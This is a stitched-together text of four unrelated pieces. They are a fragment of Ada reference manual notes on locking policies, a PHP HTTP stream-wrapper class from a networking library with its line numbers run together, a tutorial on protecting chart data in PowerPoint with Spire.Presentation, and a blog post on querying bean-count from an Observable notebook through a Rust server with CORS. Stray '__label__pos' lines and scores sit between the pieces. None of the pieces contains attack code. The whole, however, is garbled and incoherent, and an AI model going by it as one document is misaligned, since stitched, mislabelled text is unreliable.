D.5.2. How this value is interpreted depends on the locking policy; for instance, the ceiling priority is derived from this value when the locking policy is Ceiling_Locking. Wording Changes from Ada 95 23.b/2 {8652/0073} Corrigendum: Corrected the wording to reflect that pragma Locking_Policy cannot be inside of a program unit. 23.c/2 Clarified that an implementation need support only one locking policy (of any kind, language-defined or otherwise) per partition. 23.d/2 The bounded error for the priority of a task being higher than the ceiling of an object it is currently in was moved here from D.5, so that it applies no matter how the situation arises. Wording Changes from Ada 2005 23.e/3 Revised to use aspects Priority and Interrupt_Priority as pragmas Priority and Interrupt_Priority are now obsolescent. Extensions to Ada 2012 23.f/5 All protected objects now have a relative deadline, which is the value of the Relative_Deadline attribute of D.5.2. How this value is interpreted depends on the locking policy. Wording Changes from Ada 2012 23.g/4 Corrigendum: Clarified that the Priority aspect can be used to set the initial ceiling priority of a protected object that contains an interrupt handler.
__label__pos
0.687496
Source of file SimpleStreamWrapper.php Size: 11,868 Bytes - Last Modified: 2020-10-25T23:00:04+00:00 /root/gitwork/work/tornelib-php-netcurl-6.1/src/Module/Network/Wrappers/SimpleStreamWrapper.php 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462 <?php /** * Copyright © Tomas Tornevall / Tornevall Networks. All rights reserved. * See LICENSE.md for license details. */ namespace TorneLIB\Module\Network\Wrappers; use Exception; use ReflectionException; use TorneLIB\Exception\Constants; use TorneLIB\Exception\ExceptionHandler; use TorneLIB\Helpers\GenericParser; use TorneLIB\Helpers\Version; use TorneLIB\Model\Interfaces\WrapperInterface; use TorneLIB\Model\Type\authSource; use TorneLIB\Model\Type\authType; use TorneLIB\Model\Type\dataType; use TorneLIB\Model\Type\requestMethod; use TorneLIB\Module\Config\WrapperConfig; use TorneLIB\Utils\Generic; use TorneLIB\Utils\Security; try { Version::getRequiredVersion(); } catch (Exception $e) { die($e->getMessage()); } /** * Class SimpleWrapper Fetching tool in the simplest form. Using file_get_contents. * * @package TorneLIB\Module\Network\Wrappers */ class SimpleStreamWrapper implements WrapperInterface { // Note to self: Where are the static headers? Well, they are not here. For all streams // we use WrapperConfig to store header setups. /** * @var WrapperConfig $CONFIG * @since 6.1.0 */ private $CONFIG; /** * @var * @since 6.1.0 */ private $streamContentResponseRaw; /** * @var array */ private $streamContentResponseHeader = []; /** * SimpleStreamWrapper constructor. * @throws ExceptionHandler */ public function __construct() { // Base streamwrapper (file_get_contents, fopen, etc) is only allowed if allow_url_fopen is available. if (!Security::getIniSet('allow_url_fopen')) { throw new ExceptionHandler( sprintf( 'Wrapper class %s is not available on this platform since allow_url_fopen is disabled.', __CLASS__ ), Constants::LIB_METHOD_OR_LIBRARY_DISABLED ); } $this->CONFIG = new WrapperConfig(); $this->CONFIG->setStreamRequest(true); $this->CONFIG->setCurrentWrapper(__CLASS__); } /** * @since 6.1.2 */ public function __destruct() { $this->CONFIG->resetStreamData(); } /** * @inheritDoc * @return string * @throws ExceptionHandler * @throws ReflectionException */ public function getVersion() { return isset($this->version) && !empty($this->version) ? $this->version : (new Generic())->getVersionByAny(__DIR__, 3, WrapperConfig::class); } /** * @param WrapperConfig $config * @return SimpleStreamWrapper * @since 6.1.0 */ public function setConfig($config) { $this->CONFIG = $this->getInheritedConfig($config); return $this; } /** * @param $config * @return mixed * @since 6.1.0 */ private function getInheritedConfig($config) { $config->setCurrentWrapper($this->CONFIG->getCurrentWrapper()); return $config; } /** * @return WrapperConfig * @since 6.1.0 */ public function getConfig() { return $this->CONFIG; } /** * @param $username * @param $password * @param int $authType * @return SimpleStreamWrapper * @since 6.1.0 */ public function setAuthentication($username, $password, $authType = authType::BASIC) { $this->CONFIG->setAuthentication($username, $password, $authType, authSource::STREAM); return $this; } /** * @return array * @since 6.1.0 */ public function getAuthentication() { return $this->CONFIG->getAuthentication(); } /** * @inheritDoc */ public function getBody() { return $this->streamContentResponseRaw; } /** * @inheritDoc * @throws ExceptionHandler */ public function getParsed() { return GenericParser::getParsed( $this->getBody(), $this->getHeader('content-type') ); } /** * @inheritDoc */ public function getCode() { return $this->getHttpHead($this->getHeader('http'), 'code'); } /** * @return int|string * @since 6.1.0 */ public function getHttpMessage() { return $this->getHttpHead($this->getHeader('http'), 'message'); } /** * @param $string * @param string $returnData * @return int|string * @since 6.1.0 */ private function getHttpHead($string, $returnData = 'code') { return GenericParser::getHttpHead($string, $returnData); } /** * @param $key * @return string * @since 6.1.0 */ public function getHeader($key) { $return = ''; if (isset($this->streamContentResponseHeader[0]) && strtolower($key) === 'http' && (bool)preg_match('/^http\//i', $this->streamContentResponseHeader[0]) ) { return (string)$this->streamContentResponseHeader[0]; } if (is_array($this->streamContentResponseHeader)) { foreach ($this->streamContentResponseHeader as $headerRow) { $rowExplode = explode(':', $headerRow, 2); if (isset($rowExplode[1]) && strtolower($key) === strtolower($rowExplode[0])) { $return = (string)$rowExplode[1]; } } } return $return; } /** * @param mixed $key * @param string $value * @param false $static * @return SimpleStreamWrapper|WrapperConfig * @since 6.1.2 */ public function setStreamHeader($key = '', $value = '', $static = false) { if (is_array($key) && empty($value)) { // Handle as bulk if this request (for example) comes from NetWrapper. foreach ($key as $getKey => $getValue) { $this->setStreamHeader($getKey, $getValue, false); } return $this; } return $this->CONFIG->setHeader($key, $value, $static); } /** * @param string $key * @param string $value * @param false $static * @return WrapperConfig * @since 6.1.2 */ public function setHeader($key = '', $value = '', $static = false) { return $this->setStreamHeader($key, $value, $static); } /** * @param $proxyAddress * @param null $proxyType * @return $this * @since 6.1.0 */ public function setProxy($proxyAddress, $proxyType = null) { $this->CONFIG->setCurrentWrapper(__CLASS__); $this->CONFIG->setProxy($proxyAddress, $proxyType); return $this; } /** * @throws ExceptionHandler * @since 6.1.0 */ public function getStreamRequest() { $this->CONFIG->getStreamOptions(); $this->setStreamRequestMethod(); $this->setStreamRequestData(); // Make sure static headers are joined first. $this->CONFIG->getStreamHeader(); // Finalize. $this->getStreamDataContents(); return $this; } /** * @return $this * @since 6.1.0 */ private function setStreamRequestData() { $requestData = $this->CONFIG->getRequestData(); $this->CONFIG->setDualStreamHttp( 'content', $requestData ); switch ($this->CONFIG->getRequestDataType()) { case dataType::XML: $this->setStreamContentType('text/xml'); break; case dataType::JSON: $this->setStreamContentType('application/json; charset=utf-8'); break; default: $this->setStreamContentType('application/x-www-form-urlencoded'); break; } return $this; } /** * @param $contentType * @return $this */ private function setStreamContentType($contentType) { $this->CONFIG->setDualStreamHttp( 'header', sprintf( 'Content-Type: %s', $contentType ) ); return $this; } /** * @return false|string * @throws ExceptionHandler * @since 6.1.0 */ public function getStreamDataContents() { // When requests are failing, this MAY throw warnings. // Usually we don't want this method to do this, on for example 404 // errors, etc as we have our own exception handler below, which does // this in a correct way. $this->streamContentResponseRaw = @file_get_contents( $this->CONFIG->getRequestUrl(), false, $this->CONFIG->getStreamContext() ); $this->streamContentResponseHeader = isset($http_response_header) ? $http_response_header : []; $httpExceptionMessage = $this->getHttpMessage(); if (isset($php_errormsg) && !empty($php_errormsg)) { $httpExceptionMessage = $php_errormsg; } $this->CONFIG->getHttpException( $httpExceptionMessage, $this->getCode() ); return $this; } /** * @return $this * @since 6.1.0 */ private function setStreamRequestMethod() { $requestMethod = $this->CONFIG->getRequestMethod(); switch ($requestMethod) { case requestMethod::METHOD_POST: $this->CONFIG->setDualStreamHttp('method', 'POST'); break; case requestMethod::METHOD_PUT: $this->CONFIG->setDualStreamHttp('method', 'PUT'); break; case requestMethod::METHOD_DELETE: $this->CONFIG->setDualStreamHttp('method', 'DELETE'); break; case requestMethod::METHOD_HEAD: $this->CONFIG->setDualStreamHttp('method', 'HEAD'); break; case requestMethod::METHOD_REQUEST: $this->CONFIG->setDualStreamHttp('method', 'REQUEST'); break; default: $this->CONFIG->setDualStreamHttp('method', 'GET'); break; } return $this; } /** * @param $url * @param array $data * @param int $method * @param int $dataType * @return SimpleStreamWrapper * @throws ExceptionHandler * @since 6.1.0 */ public function request($url, $data = [], $method = requestMethod::METHOD_GET, $dataType = dataType::NORMAL) { $this->CONFIG->resetStreamData(); if (!empty($url)) { $this->CONFIG->setRequestUrl($url); } if (is_array($data) && count($data)) { $this->CONFIG->setRequestData($data); } if ($this->CONFIG->getRequestMethod() !== $method) { $this->CONFIG->setRequestMethod($method); } if ($this->CONFIG->getRequestDataType() !== $dataType) { $this->CONFIG->setRequestDataType($dataType); } $this->getStreamRequest(); return $this; } /** * @param $name * @param $arguments * @return mixed * @throws ExceptionHandler * @since 6.1.2 */ public function __call($name, $arguments) { $return = null; $compatibilityMethods = $this->CONFIG->getCompatibilityMethods(); if (isset($compatibilityMethods[$name])) { $name = $compatibilityMethods[$name]; $return = call_user_func_array([$this, $name], $arguments); } if (!is_null($return)) { return $return; } throw new ExceptionHandler( sprintf('Function "%s" not available.', $name), Constants::LIB_METHOD_OR_LIBRARY_UNAVAILABLE ); } }
__label__pos
0.559451
How to Protect Chart on PowerPoint Slide in C#, VB.NET When we create a PowerPoint slide that contains charts on it, we may not want others to change the chart data, especially when we create a presentation of financial report, it is very important for legal reasons that no changes get made when the slides are presented. In this article, I'll introduce how to protect chart on PowerPoint slide via Spire.Presentation in C# and VB.NET. Test File: How to Protect Chart on PowerPoint Slide in C#, VB.NET Code Snippet: Step 1: Create a new instance of Presentation class. Load the sample file to PPT document by calling LoadFromFile() method. Presentation ppt = new Presentation(); ppt.LoadFromFile("sample.pptx",FileFormat.Pptx2010); Step 2: Get the second shape from slide and convert it as IChart. The first shape in the sample file is a textbox. IChart chart = ppt.Slides[0].Shapes[1] as IChart; Step 3: Set the Boolean value of IChart.IsDataProtect as true. chart.IsDataProtect = true; Step 4: Save the file. ppt.SaveToFile("result.pptx", FileFormat.Pptx2010); Output: Run this program and open the result file, you’ll get following warning message if you try to modify the chart data in Excel. How to Protect Chart on PowerPoint Slide in C#, VB.NET Full Code: [C#] Presentation ppt = new Presentation(); ppt.LoadFromFile("sample.pptx",FileFormat.Pptx2010); IChart chart = ppt.Slides[0].Shapes[1] as IChart; chart.IsDataProtect = true; ppt.SaveToFile("result.pptx", FileFormat.Pptx2010); [VB.NET] Dim ppt As New Presentation() ppt.LoadFromFile("sample.pptx", FileFormat.Pptx2010) Dim chart As IChart = TryCast(ppt.Slides(0).Shapes(1), IChart) chart.IsDataProtect = True ppt.SaveToFile("result.pptx", FileFormat.Pptx2010)
__label__pos
0.722842
Observable + bean-count Observable + bean-count Two of my favorite tools lately are Observable (observablehq.com) (a long time favorite for quickly prototyping javascript and creating interactive visualizations) and bean-count (a more recent addition for doing "hobbyist double entry accounting" (a special form of "fun")). fava is a great open source web UI for bean-count that gives great default reports, and lets you submit custom queries.  However, part of the reason bean-count is so cool is that you have this super rich data that I want to experiment rendering in all kinds of ways, and also combine with other data like my predicted future spending etc. Naturally, I wanted to combine my two favorite tools. Localhost & CORS Fava has a nice "query" API endpoint, and I'm usually running Fava, so I was hoping I could just hit their endpoint.  The downside is that it returns its data in HTML format.  I thought about trying to parse the HTML to get the data out (a very reasonable, fixed amount of time), but decided I'd try to make a little web-server in Rust to serve my queries instead (a maybe less reasonable, more "fun" way). First I need a web server that I can query from Observable.  I started out with the exact example code from the warp docs: use warp::Filter; #[tokio::main] async fn main() { // GET /hello/warp => 200 OK with body "Hello, warp!" let hello = warp::path!("hello" / String) .map(|name| format!("Hello, {}!", name)); warp::serve(hello) .run(([127, 0, 0, 1], 3030)) .await; } I then added a block to my Observable notebook: (await fetch('http://localhost:3030/hello/there')).text() TypeError: Failed to fetch Oh no! It failed.  It's likely due to CORS, as detailed in the soFetch notebook, so I'll have to figure out how to allow cross-origin requests on my simple server. We can add some CORS handling like this: let cors = warp::cors() .allow_origin("https://pcarleton.static.observableusercontent.com") .allow_methods(vec!["GET"]); // GET /hello/warp => 200 OK with body "Hello, warp!" let hello = warp::path!("hello" / String) .map(|name| format!("Hello, {}!", name)) .with(cors); And voila! (await fetch('http://localhost:3030/hello/there')).text() "Hello, there!" Querying Now we just need to access bean query. To do that, I'll use a crate called duct which has some convenience functions for calling other commands: fn execute_query(query: &String) -> std::io::Result<String> { cmd!("bean-query", "-f", "csv", BEAN_PATH, query).read() } Then we just need to add some URI decoding so we can accept the query through the URL: fn wrap_execute(query: &String) -> String { let decoded = match urlencoding::decode(query) { Ok(s) => s, Err(_) => return String::from("error decoding query") }; match execute_query(&decoded) { Ok(s) => s, Err(e) => e.to_string() } } #[tokio::main] async fn main() { let cors = warp::cors() .allow_origin("https://pcarleton.static.observableusercontent.com") .allow_methods(vec!["GET"]); // GET /query/$QUERY_STRING let query = warp::path!("query" / String) # this is the new part .map(|q| wrap_execute(&q)) .with(cors); warp::serve(query) .run(([127, 0, 0, 1], 3030)) .await; } Then we do some encodeURI in our notebook and we're off to the races: query = `SELECT account, CONVERT(sum(position), 'USD') as position FROM date > 2020-01-01 AND date < 2022-01-01 group by account` (await fetch(`http://localhost:3030/query/${encodeURI(query)}`)).text() This still returns in CSV format, where I still want to add a JSON conversion layer. Other notes I found this StackOverflow post about debugging CORS issues useful, the tl;dr is if set the Origin header like curl -H "Origin: myorigin.com" it should simulate a cross-origin situation. I also learned that I needed to use localhost and not 127.0.0.1 to query with fetch. I didn't dig too deeply into why that is. If this was useful to you, let me know on Twitter!
__label__pos
0.814236